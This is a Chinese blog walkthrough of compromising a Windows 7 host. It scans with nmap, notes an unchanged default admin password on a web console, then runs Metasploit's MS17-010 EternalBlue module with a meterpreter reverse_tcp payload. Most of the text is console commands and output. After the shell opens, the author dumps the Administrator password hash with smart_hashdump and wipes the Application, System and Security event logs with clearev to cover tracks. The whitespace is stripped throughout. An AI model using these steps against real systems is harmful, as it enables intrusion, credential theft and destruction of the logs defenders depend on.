Metasploit-MS17-010利用

1. nmap扫一梭

nmap-T4-F--scriptms-sql-info192.168.1.8StartingNmap7.60(https://nmap.org)at2018-01-1916:24?D1ú±ê×?ê±??Nmapscanreportfor192.168.1.8Hostisup(0.010slatency).Notshown:86closedportsPORTSTATESERVICE21/tcpopenftp135/tcpopenmsrpc139/tcpopennetbios-ssn445/tcpopenmicrosoft-ds1433/tcpopenms-sql-s3389/tcpopenms-wbt-server8009/tcpopenajp138443/tcpopenhttps-alt49152/tcpopenunknown49153/tcpopenunknown49154/tcpopenunknown49155/tcpopenunknown49156/tcpopenunknown49157/tcpopenunknownMACAddress:C8:1F:66:01:82:27(Dell)Hostscriptresults:|ms-sql-info:|192.168.1.8:1433:|Version:|name:MicrosoftSQLServer2005RTM|number:9.00.1399.00|Product:MicrosoftSQLServer2005|Servicepacklevel:RTM|Post-SPpatchesapplied:false|_TCPport:1433Nmapdone:1IPaddress(1hostup)scannedin36.05seconds

2. 21、445、1433、3389、8443可以关注一下

3. 最开始东哥考虑利用ftp和mssql，发现管理员安全意识还是比较高的，密码全都改了。浏览器打开8443，发现了这个......

4. 呵呵......systemadmin的密码没有修改.....

5. 百度了一下颜色盟的文档，有一个configadmin的后台账号能够看到sa的密码，但是被实施工程师改了，如果能拿到sa密码，你懂得.....

6. 这时候我的助理小明，提出了一个思路，1.8貌似是win7的系统，为什么不试试ms17-010呢？自从ms08-067之后，好久没有这么爽的exploit了......

7. 一把梭就是干

__/\/\_____/_/__||\/|_____\\________||/\_\||\/|||___\|--|/\/__\|-__/||||||||--||_||||_|__||_/-\__\\||||\__/||||_|/|____/\___\//\\\___/\/\__||_\\___=[metasploitv4.16.31-dev]+----=[1726exploits-986auxiliary-300post]+----=[507payloads-40encoders-10nops]+----=[FreeMetasploitProtrial:http://r-7.co/trymsp]msf>useexploit/windows/smb/ms17_010_eternalbluemsfexploit(windows/smb/ms17_010_eternalblue)>infoName:MS17-010EternalBlueSMBRemoteWindowsKernelPoolCorruptionModule:exploit/windows/smb/ms17_010_eternalbluePlatform:WindowsArch:Privileged:YesLicense:MetasploitFrameworkLicense(BSD)Rank:AverageDisclosed:2017-03-14Providedby:SeanDillon<sean.dillon@risksense.com>DylanDavis<dylan.davis@risksense.com>EquationGroupShadowBrokersthelightcosineAvailabletargets:IdName------0Windows7andServer2008R2(x64)AllServicePacksBasicoptions:NameCurrentSettingRequiredDescription--------------------------------------GroomAllocations12yesInitialnumberoftimestogroomthekernelpool.GroomDelta5yesTheamounttoincreasethegroomcountbypertry.MaxExploitAttempts3yesThenumberoftimestoretrytheexploit.ProcessNamespoolsv.exeyesProcesstoinjectpayloadinto.RHOSTyesThetargetaddressRPORT445yesThetargetport(TCP)SMBDomain.no(Optional)TheWindowsdomaintouseforauthenticationSMBPassno(Optional)ThepasswordforthespecifiedusernameSMBUserno(Optional)TheusernametoauthenticateasVerifyArchtrueyesCheckifremotearchitecturematchesexploitTarget.VerifyTargettrueyesCheckifremoteOSmatchesexploitTarget.Payloadinformation:Space:2000Description:ThismoduleisaportoftheEquationGroupETERNALBLUEexploit,partoftheFuzzBunchtoolkitreleasedbyShadowBrokers.ThereisabufferoverflowmemmoveoperationinSrv!SrvOs2FeaToNt.ThesizeiscalculatedinSrv!SrvOs2FeaListSizeToNt,withmathematicalerrorwhereaDWORDissubtractedintoaWORD.Thekernelpoolisgroomedsothatoverflowiswelllaid-outtooverwriteanSMBv1buffer.ActualRIPhijackislatercompletedinsrvnet!SrvNetWskReceiveComplete.Thisexploit,liketheoriginalmaynottrigger100%ofthetime,andshouldberuncontinuouslyuntiltriggered.Itseemslikethepoolwillgethotstreaksandneedacooldownperiodbeforetheshellsraininagain.ThemodulewillattempttouseAnonymouslogin,bydefault,toauthenticatetoperformtheexploit.IftheusersuppliescredentialsintheSMBUser,SMBPass,andSMBDomainoptionsitwillusethoseinstead.Onsomesystems,thismodulemaycausesysteminstabilityandcrashes,suchasaBSODorareboot.Thismaybemorelikelywithsomepayloads.References:Alsoknownas:ETERNALBLUEhttps://technet.microsoft.com/en-us/library/security/MS17-010https://cvedetails.com/cve/CVE-2017-0143/https://cvedetails.com/cve/CVE-2017-0144/https://cvedetails.com/cve/CVE-2017-0145/https://cvedetails.com/cve/CVE-2017-0146/https://cvedetails.com/cve/CVE-2017-0147/https://cvedetails.com/cve/CVE-2017-0148/https://github.com/RiskSense-Ops/MS17-010msfexploit(windows/smb/ms17_010_eternalblue)>setRHOST192.168.1.8RHOST=>192.168.1.8msfexploit(windows/smb/ms17_010_eternalblue)>setLHOST192.168.1.220LHOST=>192.168.1.220msfexploit(windows/smb/ms17_010_eternalblue)>setpayloadwindows/x64/meterpreter/reverse_tcppayload=>windows/x64/meterpreter/reverse_tcpmsfexploit(windows/smb/ms17_010_eternalblue)>showoptionsModuleoptions(exploit/windows/smb/ms17_010_eternalblue):NameCurrentSettingRequiredDescription--------------------------------------GroomAllocations12yesInitialnumberoftimestogroomthekernelpool.GroomDelta5yesTheamounttoincreasethegroomcountbypertry.MaxExploitAttempts3yesThenumberoftimestoretrytheexploit.ProcessNamespoolsv.exeyesProcesstoinjectpayloadinto.RHOST192.168.1.8yesThetargetaddressRPORT445yesThetargetport(TCP)SMBDomain.no(Optional)TheWindowsdomaintouseforauthenticationSMBPassno(Optional)ThepasswordforthespecifiedusernameSMBUserno(Optional)TheusernametoauthenticateasVerifyArchtrueyesCheckifremotearchitecturematchesexploitTarget.VerifyTargettrueyesCheckifremoteOSmatchesexploitTarget.Payloadoptions(windows/x64/meterpreter/reverse_tcp):NameCurrentSettingRequiredDescription--------------------------------------EXITFUNCthreadyesExittechnique(Accepted:'',seh,thread,process,none)LHOST192.168.1.220yesThelistenaddressLPORT4444yesThelistenportExploittarget:IdName------0Windows7andServer2008R2(x64)AllServicePacksmsfexploit(windows/smb/ms17_010_eternalblue)>exploit[*]StartedreverseTCPhandleron192.168.1.220:4444[*]192.168.1.8:445-Connectingtotargetforexploitation.[+]192.168.1.8:445-Connectionestablishedforexploitation.[+]192.168.1.8:445-TargetOSselectedvalidforOSindicatedbySMBreply[*]192.168.1.8:445-CORErawbufferdump(38bytes)[*]192.168.1.8:445-0x0000000057696e646f7773203720556c74696d61Windows7Ultima[*]192.168.1.8:445-0x0000001074652037363031205365727669636520te7601Service[*]192.168.1.8:445-0x000000205061636b2031Pack1[+]192.168.1.8:445-TargetarchselectedvalidforarchindicatedbyDCE/RPCreply[*]192.168.1.8:445-Tryingexploitwith12GroomAllocations.[*]192.168.1.8:445-Sendingallbutlastfragmentofexploitpacket[*]192.168.1.8:445-Startingnon-pagedpoolgrooming[+]192.168.1.8:445-SendingSMBv2buffers[+]192.168.1.8:445-ClosingSMBv1connectioncreatingfreeholeadjacenttoSMBv2buffer.[*]192.168.1.8:445-SendingfinalSMBv2buffers.[*]192.168.1.8:445-Sendinglastfragmentofexploitpacket![*]192.168.1.8:445-Receivingresponsefromexploitpacket[+]192.168.1.8:445-ETERNALBLUEoverwritecompletedsuccessfully(0xC000000D)![*]192.168.1.8:445-Sendingeggtocorruptedconnection.[*]192.168.1.8:445-Triggeringfreeofcorruptedbuffer.[*]Sendingstage(205891bytes)to192.168.1.8[*]Meterpretersession1opened(192.168.1.220:4444->192.168.1.8:52121)at2018-01-2204:10:43-0500[+]192.168.1.8:445-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=[+]192.168.1.8:445-=-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=[+]192.168.1.8:445-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=meterpreter>systeminfo[-]Unknowncommand:systeminfo.meterpreter>sysinfoComputer:OS:Windows7(Build7601,ServicePack1).Architecture:x64SystemLanguage:zh_CNDomain:WORKGROUPLoggedOnUsers:0Meterpreter:x64/windows

8. 获取一下administrator密码

meterpreter>runwindows/gather/smart_hashdump[*]Runningmoduleagainst****[*]Hasheswillbesavedtothedatabaseifoneisconnected.[+]HasheswillbesavedinlootinJtRpasswordfileformatto:[*]/root/.msf4/loot/20180122193744_default_192.168.1.8_windows.hashes_513479.txt[*]Dumpingpasswordhashes...[*]RunningasSYSTEMextractinghashesfromregistry[*]Obtainingthebootkey...[*]CalculatingthehbootkeyusingSYSKEY94a522260bb0d5****4353b4ea3ced56...[*]Obtainingtheuserlistandkeys...[*]Decryptinguserkeys...[*]Dumpingpasswordhints...[+]Administrator:"******"[*]Dumpingpasswordhashes...[+]Administrator:500:aad3b435b51****eaad3b435b51404ee:4465c7d119414b7760e8afe797b4b510:::

9. 登录一下

10. 擦屁股走人

meterpreter>clearev[*]Wiping25655recordsfromApplication...[*]Wiping10343recordsfromSystem...[*]Wiping38810recordsfromSecurity...

**结论：还是把补丁打上吧**

Metasploit-MS17-010利用

原文地址：http://blog.51cto.com/hackerwang/2064098